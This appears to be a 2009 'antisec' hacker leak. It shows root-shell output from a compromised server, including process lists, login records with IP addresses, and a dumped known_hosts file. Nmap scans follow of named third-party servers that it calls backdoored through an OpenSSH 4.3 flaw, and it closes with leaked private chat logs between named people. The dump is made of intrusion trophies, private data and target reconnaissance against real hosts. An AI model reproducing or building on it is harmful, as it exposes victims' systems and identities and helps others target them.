sshd 30595 katsst 52u IPv4 0xcae45740 0t0 TCP 72.20.3.98:60229->66.41.52.92:26396 (ESTABLISHED)
|
||
sshd 30595 katsst 56u IPv4 0xca03d740 0t0 TCP 72.20.3.98:60258->122.167.178.174:29404 (ESTABLISHED)
|
||
sshd 30595 katsst 82u IPv4 0xc9dbacb0 0t0 TCP 72.20.3.98:60295->77.250.210.43:62003 (ESTABLISHED)
|
||
sshd 30595 katsst 85u IPv4 0xca0793a0 0t0 TCP 72.20.3.98:60311->93.97.7.183:38461 (ESTABLISHED)
|
||
sshd 30595 katsst 86u IPv4 0xc9a1c000 0t0 TCP 72.20.3.98:60307->65.33.173.202:24132 (ESTABLISHED)
|
||
sshd 30595 katsst 87u IPv4 0xc986f910 0t0 TCP 72.20.3.98:60312->74.173.228.216:61577 (ESTABLISHED)
|
||
sshd 30622 root 3u IPv4 0xc98fb000 0t0 TCP 72.20.28.205:ssh->89.30.147.8:3766 (ESTABLISHED)
|
||
sshd 30890 root 3u IPv4 0xc58eb000 0t0 TCP 72.20.28.205:ssh->89.30.147.8:3812 (ESTABLISHED)
|
||
[root@velocity:/var/run]#
|
||
|
||
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
|
||
ANTISECFORLULZ ANTISECFORLULZ
|
||
ANTISECFORLULZ [root@velocity:/]# ps -aux | grep romeo ANTISECFORLULZ
|
||
ANTISECFORLULZ root 98610 0.0 0.2 5400 2004 ?? Is 12:16PM 0:00.19 sshd: romeo [priv] (sshd) ANTISECFORLULZ
|
||
ANTISECFORLULZ romeo 98648 0.0 0.2 5384 2052 ?? S 12:16PM 0:03.21 sshd: (sshd) ANTISECFORLULZ
|
||
ANTISECFORLULZ romeo 27874 0.0 0.6 9104 6212 p0 S+ 2:21PM 0:04.59 irssi -h absolute.ownage.net ANTISECFORLULZ
|
||
ANTISECFORLULZ romeo 32521 0.0 0.1 3272 1384 p0 Is 7:40PM 0:00.05 /usr/local/bin/bash ANTISECFORLULZ
|
||
ANTISECFORLULZ romeo 27845 0.0 0.1 2040 1376 p2 S+ 2:20PM 0:00.04 screen -r ANTISECFORLULZ
|
||
ANTISECFORLULZ romeo 98652 0.0 0.2 3244 1848 p2 Is 12:16PM 0:00.03 -bash (bash) ANTISECFORLULZ
|
||
ANTISECFORLULZ root 32868 0.0 0.1 1552 872 p3 L+ 4:23PM 0:00.00 grep romeo ANTISECFORLULZ
|
||
ANTISECFORLULZ ANTISECFORLULZ
|
||
ANTISECFORLULZ [root@velocity:/]# killall screen ANTISECFORLULZ
|
||
ANTISECFORLULZ ANTISECFORLULZ
|
||
ANTISECFORLULZ [00:25:59] * Quits: @pimpinjg (FBI@tdirc-1243C38A.deploy.akamaitechnologies.com) (Quit: Lost terminal) ANTISECFORLULZ
|
||
ANTISECFORLULZ [00:25:59] * Quits: &RoMeO (root@DarkMindZ.com) (Quit: Lost terminal) ANTISECFORLULZ
|
||
ANTISECFORLULZ ANTISECFORLULZ
|
||
ANTISECFORLULZ ANTISECFORLULZ
|
||
ANTISECFORLULZ [12:29am] <~RoMeO> wtf is up with screen :@ ANTISECFORLULZ
|
||
ANTISECFORLULZ [12:29am] <+G-Brain> 23:26 -!- RoMeO [root@DarkMindZ.com] has quit [Quit: Lost terminal] ANTISECFORLULZ
|
||
ANTISECFORLULZ [12:30am] <~RoMeO> "[screen is terminating]" with no reason ANTISECFORLULZ
|
||
ANTISECFORLULZ [12:30am] <+G-Brain> hah ANTISECFORLULZ
|
||
ANTISECFORLULZ [12:30am] <%p3ri0d> oh yeah ANTISECFORLULZ
|
||
ANTISECFORLULZ [12:30am] <+G-Brain> it has a few shitty default key bindings ANTISECFORLULZ
|
||
ANTISECFORLULZ [12:30am] <~RoMeO> ctrl+D ANTISECFORLULZ
|
||
ANTISECFORLULZ [12:30am] <~RoMeO> didnt do that ANTISECFORLULZ
|
||
ANTISECFORLULZ [12:33am] <~RoMeO> gay shit ANTISECFORLULZ
|
||
ANTISECFORLULZ [12:33am] <+G-Brain> [romeo@juliet]$ pkill -9 screen ANTISECFORLULZ
|
||
ANTISECFORLULZ ANTISECFORLULZ
|
||
ANTISECFORLULZ ANTISECFORLULZ
|
||
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
|
||
|
||
[root@velocity:/]# last | grep romeo
|
||
romeo ttyp3 188.50.84.224 Thu Jul 2 23:06 - 00:24 (01:17)
|
||
romeo ttyp0 188.50.84.224 Thu Jul 2 22:53 - 01:52 (02:58)
|
||
romeo ttyp6 188.51.85.13 Thu Jul 2 14:49 - 17:59 (03:09)
|
||
romeo ttyp5 188.51.85.13 Thu Jul 2 12:12 still logged in
|
||
romeo ttyp5 188.51.85.13 Thu Jul 2 11:02 - 11:05 (00:02)
|
||
romeo ttyp5 188.51.85.13 Wed Jul 1 20:29 - 20:29 (00:00)
|
||
|
||
[root@velocity:/]# cat ~/ssh/known_hosts
|
||
light.co1.org ssh-dss AAAAB3NzaC1kc3MAAACBAN3XmImvEAnfEUs2QzYWuj7LVVNVNwPuIDfO9Wb+aSWWRwD28hXbfVSw3llyo+p8aERrCn5FcbVHodgmt7IuEER9roB6AoiH664XsQwIviSx/2mvMrvXVGYmdvtSINnwNH389DS2/chf2gsBz772tTNT2c8myM4drZ2ArkeNP81JAAAAFQDAt8OXB+nbsHkfxhYZzUtY5DWIcwAAAIEAoUvbQneoUMbzYNF71L7/6vQxcV9rnYSAOs7NBB3aH61NG+gYgSh0FL0Ctv2PcqFsjRLE7UK/mcl1Dvq5K87CGfcH4LDCiuI0zB9lWZfWbuN5axCllFczboa4ED5VkPfjEJDmKQbbSvVlQE9TTa3QPY8bxQmcDJ5e4nKcq2s0zbMAAACAPSrhPRr4kNipRtQMAztneiqaixSr6w/8CnXIINAMf/9xWqmg0ZWnsgOpY5t30m6BEEPZL/mjspAXnY5AKS6ZcIOzq5zFnw3Gvgz4E/X5uDvR2TUaEBFQI8noDyzMBH2KTcj2ipuEYr5SKYEtgBB8zCMXuJ2ufDBb0H9tjIJnf8M=
|
||
zelda.vitalspeeds.com ssh-dss AAAAB3NzaC1kc3MAAAEBAKPbekcqfiUr+bg1wPxVWTYqnanbeckqLRM7N7g/24kGTi5ITtv4mbbWZrcdlkKOn0pjjpD4/cZ9NOZ5L9kn3+TOb4oozTB4zFbQKqNvQAr7/iw8eR72bdoRyzNCDLZpkM/4nMoMNclyZuUulYf7PHqqqiMVdcPNvis78GteI6uajJEQlIPiLB2oaFWrBvcGmbaBC4iKihvprcJJ+9dsKVlbXVBR6kkjagvr+jkhDxYQ5cWtwy+0+7/tiogvinuTUNdgxyociCv26aLBdwTQuluiJhYSWLR2HnV2qxnNRoqzoIQY8gxLBHDNh58k7puc9KMIE0D9XNDfkf6cSQeQpIMAAAAVAOqStUQquE8fqirTa8WxVJbo99i5AAABAHh+6hGu61iPvGQ20dw3+8+O0rc94famvy9gO2+8USsT4/pyqKVdPtXjZVcwSMVpcO+9Oj4fQSs+KRxmb3pfCmY0sdUpsuSiCaBDxKj7M45C+m9LzgytZi5iaesnOxipp0NS+xgvDJ1fqOj3hmLYl89wo6CCHBZhHo4jJ1/FzBmIXQZJOAsek61DOzkKzSdm8zZDZQEcP/DjNd9tLWWomDvOLZ0kwoUqlF08vxKU19wnMgvFyKUbE8bWq02/gE1dOwZ7IsemosVlVj1ogw/L/J2NeEnESnoYFSBKdKDmRqSvFmgtRGKxhGGjvw63054g+9UzJxOXdVHymqktH9aGQ+MAAAEAdJuQ46uo8jolkRk0hD3zoBweKjZWacEe7OkSw1jxk8LoGV3VjDMqAvf4xcPUje7l6tKeyrdoR1u7LcweDobqn5d8Ok1Ui0zZIf0hQQBGE5ecKNDEE7AOrbc7kBNNInRxgTnkGu87+k6d05tWHyHlXIZTEceblYZ2iM8ZSpKViTO2lL3nq7JwA3sSHX2pcJ0ED5vlw2KtafbXs+8VFga9s1+DJIvF/TrUasW/3Hlt+13/4EHp8H7fJZzEN1SUj8JfGuoLu4rsceCkBYwxPW/zidGxrgkgGZXePnN7Hnttzx8KFFuJRIrIIMiCJFEWcKMBc1+knCgF9iON2h7g0KSACQ==
|
||
72.20.18.193 ssh-dss AAAAB3NzaC1kc3MAAACBAKnwL2xkqjelqTjnJT2ZGFEa9xRUpmdVdx0WSc3SAuDBnFmIv3JLOWsUwTzAtbvs8oRc6HTqrhardxR/C5Xym2dxvnYU7cjKxZHSuH3u9lchW1HS6OWr63fPdLXDDU1LWkvPVGCHzZKw1sZti/3LFMW6HWZDgsMyAQ/q+LeD/E2rAAAAFQD/Ftrlj6cfUu6ItwNJ7loaosdwuwAAAIBwuBVkHiiibruCbl6EwrbrZ/YA80HIS6xgVYK3AoAckXoClY2j8xAkRC4EirwsruTyGNK2BexAXx4E7JAkDvDs9hs8EfSo3TixtXuiBQVUSBpVm/P3425MbDioqQtYm1Q8GFP60vdq8DI3nTXvP+4y/KpDPiuwVX8ifyg9gML3+wAAAIBlRfTV+UdJNa2rN5j4EDHiI0xzuv1NEDIDKKH1XJqBZpdAyyqc+mYkLPcFn/3/T8Cw47G24Umou/lh+XK4PCUIXsUEwc3xGjENwRf62AXpvadEjzoUiyMQ5LEnEUyRBxBWTZtqOJE7EGL97kEDg+WnPd0X5qso9BDjP+LaT+Bqnw==
|
||
72.20.18.144 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYfv1zRyKyjF625A/39tr/lYfiIxeUcA0zrZFCBGD5Na+6BgKMWkTk9UxoIVc7H0hUsmkIejnjEFjjS8Jatao4VKCMXHkfPoVQnhp7bAmHc5ZwgBdAi+ENhN+acKhx3JnRy11q/wviOd2QVkoJQXfqc2zKCLC5LDlDOn2Pjbz3/cU6nOPNub1t2cxzXGZ3ez57uGstob7iXz1xFELB2oskr/Ews0WjmN0HPYSwfL/LntpA5ciBUp2L04pPrJRyH+nYPbUn09j/rmN/d9FxVyzKE7PSeVXRybE6DXZoPG00pTU7gVeb4sMjnCJbo8e8TUHrD3roaoADJK9KGYxfUBSw==
|
||
88.196.163.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4wjPA3bTL9ZvD137cH5sn8QnvuyMiZN13SF1gnojBAVC2EA1xO0F9okHLukDL+gTEOpbN+JA0W4rMrzAe58+dhSBpSSJlGnNwb14jLEp6GxYDn31+SRns8RWgprq7b/AD7aBUimlE2ExB9I57HIm31XVfO5QsMlg9EW2//4E6vU=
|
||
ntora.eml.ee,194.204.32.101 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzoxPtx6AsAOJ+ZZmvtHHBWDi+mH9meDP24M9FPpxAn7lmoXDFlftNURU83/LjTMcym+jsbPVFMC3w6HrRyQQ8v8GFJVR9z/hfKFlUzEUEO7TX1UK39Mswo90wbTwhOpwD3/XkP6YsPZQwN+EN5x37oH9PCXs9KxVCAju0alSrw0=
|
||
72.20.18.145 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYfv1zRyKyjF625A/39tr/lYfiIxeUcA0zrZFCBGD5Na+6BgKMWkTk9UxoIVc7H0hUsmkIejnjEFjjS8Jatao4VKCMXHkfPoVQnhp7bAmHc5ZwgBdAi+ENhN+acKhx3JnRy11q/wviOd2QVkoJQXfqc2zKCLC5LDlDOn2Pjbz3/cU6nOPNub1t2cxzXGZ3ez57uGstob7iXz1xFELB2oskr/Ews0WjmN0HPYSwfL/LntpA5ciBUp2L04pPrJRyH+nYPbUn09j/rmN/d9FxVyzKE7PSeVXRybE6DXZoPG00pTU7gVeb4sMjnCJbo8e8TUHrD3roaoADJK9KGYxfUBSw==
|
||
localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
|
||
corp.efnet.net,66.63.177.130 ssh-dss AAAAB3NzaC1kc3MAAACBAIEGPI/+Mc3k8MLPbka2tHwx3R61Cg8Vm1R7tvlS7GJuGLUVAfMsEVGKkS/YMLFMoEoAi+vbKAi26YAW82BzJqGSeGNBtEYw6Xs0I6GrWmNKIQQZUEC/M2krMWaTw1ABCIS7K9DGWZFDclWIN73fBKzaWpUyT7X1aLjIBMR9b6nTAAAAFQCAUudmdw3AlJAzG4L5e0tOgHECRwAAAIBTHFmZBp8xyujK0irLERfUFGSMxrqtq4TqpZL0n6Zp/PgsG/TaGgc/B7XLxya3GkzDNnXUO3CtQe/rv5bM+68MwSO+8iFnYid2vinu6C5R1dTAKD9QYKR74U5naARdUnUtOmUVKRPHD9kOlJJuyWYjSCLbxnERzCB8/YHbkvcuYAAAAIAYsHYvOIIDzv7QWN/trtJbYbCAwaKDu0UB/bKN0iMJxxHTRRRfw8TxQ+y9YsfcFPcsMxwKUp+9+q7zjyi6dQ9FLfmMk3TiBiVGZgC20LE5K1TTMYERptzWCI4Ic6HiYAAHEnNxEb0jLmdGMnyWGq89h7AGcGLWPkj4zDn9MMgjmw==
|
||
72.20.28.202 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
|
||
98.124.176.76 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq20pbQHr81GL9ny66Z9uzGPPmk3dV8P8QgyBi/tHze21Fx30Uh0z7iq8jw0C+Qc+CZdgtIZBSqZrwyEH9m4mORGyST44c2eTH8Bpao++YIWXxu3qPN7L4idVwKfaWygLB4Xo1fJspA1P6NR6WEuJAS3Xtzs8pEo5MPlFQeS/VFv6SPYqURviwJIAGxt/nHDMRGvteQP2/k+m/jCWZy2bP1tbuPMxYqODoesqqtmyAnhjIIWzXtACA6Y7wJCXwSDdgsXYilzdunChYCtoodsad2zrxaR+bi3RQ7xWBAZu8zEfFxbOMDJiFQedWA9mzg4KR0Nn9DZDvXt/jPO/lqOPPQ==
|
||
98.192.246.70 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA5iUbneFne+6pmfWqlHfXk19SpS8GAM6peFONJOQXMOhTYKnQvZg+3H4eP0aa3gr0ejDbr/UCyZugRez31OolzZsICM99dSE1yIdD57XFczY0QxffOz5C40dQvlfvNmQXRSptqYygHLJIvm1p6qpyZrnrhRwV5OiNogYLLMQqKRFxOlJWUEa/78mgfQ/LI3Edu1JX79cfhmYKak+WAs+ph3yn70HiFemksr3xJ7G2GQxGsg7jkbAnsrcsSO3KkI99uy9HN+dB2+sEu18kVzEYdKz0T1pjNZ3B5o2B55GhEsoHvrqpBNRmXT7jJcD4v0m0NqYfbFwmj4/x1ykfbmVf7w==
|
||
189.14.205.42 ssh-dss AAAAB3NzaC1kc3MAAACBAJgf4VlHspyNWVtAQpi0Lsf78P5bted4NBEAk0MX6w0DNnomC1/kiqOa2pNeZSB05NT42z8+Pxc2a5JwNRolfbpRXPMvMvHYwDMsZAYerz6KOc04nwVskMLBP47bBV6IMbJf2DV7OMBuZI4Li7QfAyW/qJpwUnctChFjSscyv+srAAAAFQDiHNMyrvXk8AJkeKusaJ9vUGdtJwAAAIBr1lDX9MHqMpoeZFE3vX6VbrPfBqK5Zm0EgdSf9QdbGFVD5YcLQhyc88jsrR2sCUBNmQN9hV8o7NedqAFQK1RKToN7ZvrzuFNcOT+yO6/B1Z2WniNojmrbd7/27dJCQz02yXl96f1pFUUcU7gRMdgI9WngNqOE8ZMl3B/jw/MwuAAAAIAoMJDeUlKhowiywrlFC511AfRe+5KfhqK2ohhKne1yr4r5fBrVeTsZeN39qeu23dUOTc7xXP47Iu7STxF7vX6Jw29OWx9vytwbCGNHPMr1kTgRr9n+lHutOZmCqvag2rALA8gs+KUfYrwdUs1p7PDVuTO8bk4HRSPs9wCQnlmpOg==
|
||
makosolutions.com,67.225.142.98 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyJk4nZcAAMllBRJJHJsGZwzviFMbG4kH8OcoRHeC4nXVH+6qs/R79k1Wn0bW7jx4eOW7CtRqW0xLwGTh1eCth7015qq6ekk55gTtZxWHhr6bmX3spalyW9KikPG4j5OM6MThTUaTcJ+GeFLYjlWXqkvIiTTukAxPo5SgfQXT8Fk=
|
||
89.46.100.252 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
|
||
quad1.ircvps.com ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvsQ8ja7kV6D7wZD+jlhi+7DwbqcqB3ejjwPD23ddkQ/DI7GL2hCcdYDAvmLhTS6NOleR3mWXsyDcG8RIUNOjI1tWM/A21p1W9CvPI0bx01kab3iyKhQNe9X+hGkbnm+Hxhg0aBNA0d5yrzNM7Iip1DBKoZE4ZpKxOdrMzZAtYJQIvGQel+EHknF90v6yAuOac+jKBeu23IO6iXAIHbT2y2t4xYzSBwDEctbB57UjcJIkiz5+EvDMfS9BA12CnliyEcN8rdm2L9nKxeczD5TcJT9w4k1hn8KUH6k0Fo7pBVMKS0++OxiWahNUa5kWqFqcdBybMhtaoSr9n63pbFCo1Q==
|
||
|
||
// Backdoored Servers (Makosolutions, Efnet, IRCVPS, etc..) all running OpenSSH <= 4.3
|
||
|
||
NMap Scans of all servers compromised
|
||
-------------------------------------
|
||
|
||
1. nmap -v -sV -P0 webhostline.com -p 2222
|
||
|
||
Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Tim
|
||
e
|
||
NSE: Loaded 3 scripts for scanning.
|
||
Initiating Parallel DNS resolution of 1 host. at 11:28
|
||
Completed Parallel DNS resolution of 1 host. at 11:28, 0.09s elapsed
|
||
Initiating SYN Stealth Scan at 11:28
|
||
Scanning 6696220213.hostnoc.net (66.96.220.213) [1 port]
|
||
Discovered open port 2222/tcp on 66.96.220.213
|
||
Completed SYN Stealth Scan at 11:28, 0.77s elapsed (1 total ports)
|
||
Initiating Service scan at 11:28
|
||
Scanning 1 service on 6696220213.hostnoc.net (66.96.220.213)
|
||
Completed Service scan at 11:28, 0.57s elapsed (1 service on 1 host)
|
||
NSE: Script scanning 66.96.220.213.
|
||
NSE: Script Scanning completed.
|
||
Host 6696220213.hostnoc.net (66.96.220.213) is up (0.24s latency).
|
||
Interesting ports on 6696220213.hostnoc.net (66.96.220.213):
|
||
PORT STATE SERVICE VERSION
|
||
2222/tcp open ssh OpenSSH 4.3 (protocol 2.0)
|
||
|
||
Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
|
||
Raw packets sent: 1 (44B) | Rcvd: 48 (4086B)
|
||
|
||
|
||
2. nmap -v -sV -P0 -p 22 vitalspeeds.com
|
||
|
||
Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Tim
|
||
e
|
||
NSE: Loaded 3 scripts for scanning.
|
||
Initiating Parallel DNS resolution of 1 host. at 11:28
|
||
Completed Parallel DNS resolution of 1 host. at 11:28, 0.02s elapsed
|
||
Initiating SYN Stealth Scan at 11:28
|
||
Scanning ukscene.diyhost.co.uk (66.197.170.181) [1 port]
|
||
Discovered open port 22/tcp on 66.197.170.181
|
||
Completed SYN Stealth Scan at 11:28, 0.82s elapsed (1 total ports)
|
||
Initiating Service scan at 11:28
|
||
Scanning 1 service on ukscene.diyhost.co.uk (66.197.170.181)
|
||
Completed Service scan at 11:28, 0.52s elapsed (1 service on 1 host)
|
||
NSE: Script scanning 66.197.170.181.
|
||
NSE: Script Scanning completed.
|
||
Host ukscene.diyhost.co.uk (66.197.170.181) is up (0.25s latency).
|
||
Interesting ports on ukscene.diyhost.co.uk (66.197.170.181):
|
||
PORT STATE SERVICE VERSION
|
||
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
|
||
|
||
Nmap done: 1 IP address (1 host up) scanned in 3.14 seconds
|
||
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
|
||
|
||
3. nmap -v -sV -P0 -p 22 stardustdawn.com
|
||
|
||
Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Tim
|
||
e
|
||
NSE: Loaded 3 scripts for scanning.
|
||
Initiating Parallel DNS resolution of 1 host. at 11:29
|
||
Completed Parallel DNS resolution of 1 host. at 11:29, 0.69s elapsed
|
||
Initiating SYN Stealth Scan at 11:29
|
||
Scanning mx101.stardustdawn.com (64.191.69.101) [1 port]
|
||
Discovered open port 22/tcp on 64.191.69.101
|
||
Completed SYN Stealth Scan at 11:29, 0.80s elapsed (1 total ports)
|
||
Initiating Service scan at 11:29
|
||
Scanning 1 service on mx101.stardustdawn.com (64.191.69.101)
|
||
Completed Service scan at 11:29, 0.60s elapsed (1 service on 1 host)
|
||
NSE: Script scanning 64.191.69.101.
|
||
NSE: Script Scanning completed.
|
||
Host mx101.stardustdawn.com (64.191.69.101) is up (0.24s latency).
|
||
Interesting ports on mx101.stardustdawn.com (64.191.69.101):
|
||
PORT STATE SERVICE VERSION
|
||
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
|
||
|
||
Nmap done: 1 IP address (1 host up) scanned in 3.90 seconds
|
||
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
|
||
|
||
|
||
4. nmap -v -sV -P0 -p 2022 irc.indoirc.net
|
||
|
||
Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Tim
|
||
e
|
||
NSE: Loaded 3 scripts for scanning.
|
||
Warning: Hostname irc.indoirc.net resolves to 2 IPs. Using 70.34.192.50.
|
||
Initiating Parallel DNS resolution of 1 host. at 11:29
|
||
Completed Parallel DNS resolution of 1 host. at 11:29, 0.01s elapsed
|
||
Initiating SYN Stealth Scan at 11:29
|
||
Scanning ip-70-34-192-50.razorservers.com (70.34.192.50) [1 port]
|
||
Discovered open port 2022/tcp on 70.34.192.50
|
||
Completed SYN Stealth Scan at 11:29, 0.82s elapsed (1 total ports)
|
||
Initiating Service scan at 11:29
|
||
Scanning 1 service on ip-70-34-192-50.razorservers.com (70.34.192.50)
|
||
Completed Service scan at 11:29, 0.55s elapsed (1 service on 1 host)
|
||
NSE: Script scanning 70.34.192.50.
|
||
NSE: Script Scanning completed.
|
||
Host ip-70-34-192-50.razorservers.com (70.34.192.50) is up (0.26s latency).
|
||
Interesting ports on ip-70-34-192-50.razorservers.com (70.34.192.50):
|
||
PORT STATE SERVICE VERSION
|
||
2022/tcp open ssh OpenSSH 4.3 (protocol 2.0)
|
||
|
||
Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds
|
||
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
|
||
|
||
5. nmap -v -sV -P0 -p 22 absolute.ownage.net
|
||
|
||
Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 12:23 GTB Daylight Tim
|
||
e
|
||
NSE: Loaded 3 scripts for scanning.
|
||
Initiating Parallel DNS resolution of 1 host. at 12:23
|
||
Completed Parallel DNS resolution of 1 host. at 12:23, 0.51s elapsed
|
||
Initiating SYN Stealth Scan at 12:23
|
||
Scanning absolute.ownage.net (72.20.28.205) [1 port]
|
||
Discovered open port 22/tcp on 72.20.28.205
|
||
Completed SYN Stealth Scan at 12:23, 0.88s elapsed (1 total ports)
|
||
Initiating Service scan at 12:23
|
||
Scanning 1 service on absolute.ownage.net (72.20.28.205)
|
||
Completed Service scan at 12:23, 0.64s elapsed (1 service on 1 host)
|
||
NSE: Script scanning 72.20.28.205.
|
||
NSE: Script Scanning completed.
|
||
Host absolute.ownage.net (72.20.28.205) is up (0.31s latency).
|
||
Interesting ports on absolute.ownage.net (72.20.28.205):
|
||
PORT STATE SERVICE VERSION
|
||
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
|
||
|
||
Nmap done: 1 IP address (1 host up) scanned in 4.07 seconds
|
||
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
|
||
// OpenSSH upgraded to 5.2
|
||
|
||
6. nmap -sV -p 22 ircvps.com
|
||
|
||
Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-19 13:37 GTB Standard Time
|
||
Interesting ports on s69-163-34-138.in-addr.arpa.static.dsn1.net (69.163.34.138)
|
||
:
|
||
PORT STATE SERVICE VERSION
|
||
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
|
||
|
||
Service detection performed. Please report any incorrect results at http://nmap.
|
||
org/submit/ .
|
||
Nmap done: 1 IP address (1 host up) scanned in 2.59 seconds
|
||
|
||
|
||
7. anti-sec:~/pwn# ./map ssanz.net
|
||
|
||
IP: 66.197.143.133 ( osiris.ssanz.net )
|
||
WWW: Apache/2.2.11
|
||
SSH: SSH-2.0-OpenSSH_4.3
|
||
|
||
IP: 66.197.204.101 ( devil.ssanz.net )
|
||
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5
|
||
mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
|
||
SSH: SSH-2.0-OpenSSH_4.3
|
||
|
||
|
||
8. Astalavista
|
||
|
||
[7/4/2009 3:39:52 PM] Glafkos Charalambous: the exploit is openssh v4.3 and below
|
||
[7/4/2009 3:40:17 PM] Glafkos Charalambous: what OS was asta running ?
|
||
[7/4/2009 3:40:28 PM] Pascal Mittner: CentOS
|
||
[7/4/2009 3:40:53 PM] Glafkos Charalambous: centos 5.3 latest version comes with openssh 4.3p2
|
||
|
||
|
||
|
||
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
|
||
ANTISECFORLULZ ANTISECFORLULZ
|
||
ANTISECFORLULZ Private Chat Logs ANTISECFORLULZ
|
||
ANTISECFORLULZ ANTISECFORLULZ
|
||
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
|
||
|
||
|
||
--- Log opened Wed Jun 17 09:05:41 2009
|
||
09:05 [Glyph(Glyph@mods.govsec.org)] might want to be more selective.. your 0day is starting to become apparent with each g0troot
|
||
09:06 -pand!- Irssi: Starting query in bhf with Glyph
|
||
09:07 (RoMeO) wat
|
||
09:07 (Glyph) Need to be more 'selective'
|
||
09:07 (Glyph) two of two ... tsk, tsk, tsk..
|
||
09:07 (RoMeO) you need to explain more, and why do you think i wrote 'g0troot' or ever used it
|
||
09:07 (Glyph) If you keep up with that, everyone is gonna now where to look.
|
||
09:08 (RoMeO) and where did you see me use it? lol
|
||
// Everywhere..
|
||
|
||
09:08 (Glyph) Doesn't what distro, when there's another 'common element'
|
||
// OpenSSH <= 4.3
|
||
|
||
09:08 (Glyph) Just saying need to be more circumspect.
|
||
09:08 (Glyph) Not saying 'you'..
|
||
09:09 (RoMeO) okay :]
|
||
09:09 (Glyph) But I know you'll get w1rd to those responsible.
|
||
09:09 (Glyph) Capice?
|
||
09:09 (RoMeO) will do
|
||
09:09 (Glyph) If the 'perps' keep it up, it won't be a 0day now will it?
|
||
09:10 (RoMeO) ofcourse, but again... i am pretty sure you dont know where to look and if you look hard you will see 'g0troot' only used once in public
|
||
09:10 (RoMeO) so i dont know what do you mean by 'need to stop using it' sicne it was only used once from what i read
|
||
09:11 (Glyph) Rightio.
|
||
09:11 (Glyph) two out of two
|
||
09:11 (Glyph) Both had a common element.
|
||
09:11 (RoMeO) which is
|
||
09:11 (Glyph) Besides being shitty about 'security'
|
||
09:11 (Glyph) For pay type product.
|
||
09:12 (RoMeO) yeah
|
||
09:12 (RoMeO) the targetted people are publicized
|
||
09:12 (RoMeO) they are the people that say they are security experts while they dont really qualify to be your average noob
|
||
09:12 (RoMeO) the people who publish exploits
|
||
09:13 (RoMeO) people who make money out of free stuff, related to 'security' etc
|
||
09:13 (Glyph) lol.. not yesterday's demo ;)
|
||
09:13 (RoMeO) yesterday was just to prove something to dark
|
||
09:13 (RoMeO) he didnt say a word after that
|
||
09:13 (Glyph) Aye.. but .....
|
||
